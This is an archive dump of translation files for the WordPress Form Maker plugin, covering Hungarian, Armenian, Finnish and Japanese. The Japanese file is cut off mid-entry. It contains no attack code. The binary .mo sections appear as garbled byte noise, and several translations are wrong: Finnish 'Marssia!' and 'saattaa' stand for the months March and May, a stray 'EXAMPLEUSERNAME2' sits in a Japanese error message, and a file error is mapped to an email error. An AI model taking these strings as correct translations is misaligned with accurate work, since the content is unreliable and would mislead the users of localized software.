#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Az"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "megy "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "visszaállítása "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Válasszon ki egy mezőt "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Válasszon ki egy dátumot"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-hy_AM.mo000060400000010441152434416630012170 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��
A
L
b
q

z

�
�

�
$�
7�
4@O\	dn}����
�'���,HUl��a�0

D
O
a
Ef
}�
*J[.h��?"@bJ�>�n-A��"�4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:58+0400
PO-Revision-Date: 2015-05-22 16:58+0400
Last-Translator: 
Language-Team: 
Language: hy
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
ԱպրիլՏարածքի կոդՕգոստոսՑենտՔաղաքԵրկիրԴեկտեմբերԴոլարError, էլ չի ուղարկվել:Error, ֆայլի չի կարող տեղափոխվել:Error, սխալ անվտանգության կոդը:ՓետրվարԱռաջին- ից գնալ ՀունվարՀուլիսՀունիսԱնցյալՄարտՄայիսիՄիջինՈչինչ չի ներկայացվել.ՆոյեմբերՀոկտեմբերՀեռախոսահամարՓոստային / Zip CodeՔանակըՎերականգնելԸնտրել ամսաթիվԸնտրել դաշտՍեպտեմբերՆերեցեք, Ձեզ չի թույլատրվում բեռնել այս տեսակը ֆայլը.Նահանգ / Մարզ / ՏարածաշրջանՓողոցՓողոց Line 2The Ֆայլը գերազանցում է թույլատրելի չափը:Այս դաշտը %s պահանջում է եզակի մուտքի արժեքը, եւ դա արդեն ներկայացվել.Սա ոչ թե վավեր էլ.ՎերնագիրՄինչեւՍտուգման հղում է անվավեր:Դուք կարող եք ընտրել նախկին ժամկետները. Ընտրեք ամսաթիվը սկսած ընթացիկ մեկը.Ձեր էլփոստի հասցեն արդեն ստուգված.Ձեր էլփոստի հաջողությամբ ստուգված.Ձեր էլփոստի ստուգման ժամանակը սպառվել է.Ձեր ձեւ հաջողությամբ ներկայացվել.Ձեր IP-ն սեւ ցուցակում. Խնդրում ենք կապնվել կայքի կառավարչին. Ձեր հաշիվը պետք է լինի ոչ պակաս, քան Դաշտը պարտադիր է:արժեքը պետք է լինի languages/form_maker-fi.mo000060400000007256152434416630011603 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
J
W
	^
h
q
u
	~
&�
"�
�
�
�
	)28A
IW	mw
�	�����9�!
;FX\Ry-��

 

Q.
$�
#�
+�
&�
A!^��4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:55+0400
PO-Revision-Date: 2015-05-22 16:55+0400
Last-Translator: 
Language-Team: 
Language: fi
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
HuhtikuuSuuntanumeroElokuusenttiä KaupunkiMaaJoulukuudollaria Virhe, sähköposti ei ole lähetetty.Virhe, tiedostoa ei voi siirtää.Virhe, väärän suojakoodin.Helmikuuensimmäinenalkaen Siirry TammikuuHeinäkuuKesäkuuViimeMarssia!saattaaKeskimmäinenMitään ei jätetty.MarraskuuLokakuuPuhelinnumeroPostinumero / Zip Codemäärä Nollaa Valitse PäivämääräValitse Kenttä SyyskuuPahoittelemme, et voi lähettää tämän tiedostotyypin.State / Province / RegionKatuosoiteKatuosoite Rivi 2TheKoko ylittää sallitun koonTämän kentän %s vaatii ainutlaatuinen merkintä, ja tämä arvo on jo jätetty.Tämä ei ole kelvollinen sähköpostiosoite.OtsikkoJos haluatVahvistuslinkin on virheellinen.Et voi valita entisiä päivämääriä. Valitse päivämäärä alkaen nykyinen.Sähköpostiosoite on jo todennettu.Viesti on onnistuneesti todennettu.Sähköpostisi todentaminen on vanhentunut.Sinun lomake onnistuneesti toimitettu.IP on mustalla listalla. Ota yhteyttä sivuston ylläpitäjään.Sinun pisteet pitäisi olla alle kenttä vaaditaan.arvon on oltava välillä languages/form_maker-ja.po000060400000057761152434416630011610 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:59+0400\n"
"PO-Revision-Date: 2015-05-22 16:59+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: ja\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "住所"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "ストリート住所2行目"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "都市名"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "都道府県/州/地域"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "郵便番号"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "国名"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "1月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "2月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "3月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "4月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "5月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "6月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "7月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "8月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "9月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "10月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "11月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "12月"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "エラー、間違ったセキュリティコード。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr ""
"あなたのIPがブラックリストに登録されている。ウェブサイトの管理者に連絡してく"
"ださい。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "ファイルの許容サイズを超えています"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr ""
"申し訳ありませんが、この種類のファイルをアップロードすることはできません。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "エラーは、ファイルを移動することはできません。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"このフィールドは、 %s固有のエントリを必要とし、この値が既に提出されました。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "エラーメールが送信されませんでした。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "何も送信されていません。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "フォームが正常に送信されました。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "エラーメールが送信されませんでした。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "あなたのメールアドレスは既に確認されています。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "あなたのメールが正常に検証されています。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "あなたの電子メールの検証がタイムアウトしました。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "確認用のリンクは無効です。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "フィールドは必須です。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "EXAMPLEUSERNAME2 は無効なメール アドレスです。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"あなたは元の日付を選択することはできません。現在の1から開始日を選択してくだ"
"さい。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "値はの間でなければなりません "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "数量。 "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "あなたのスコアは以下でなければなりません "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "役職"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "名前"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "最終"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "中"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "エリア コード。市外局番。"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
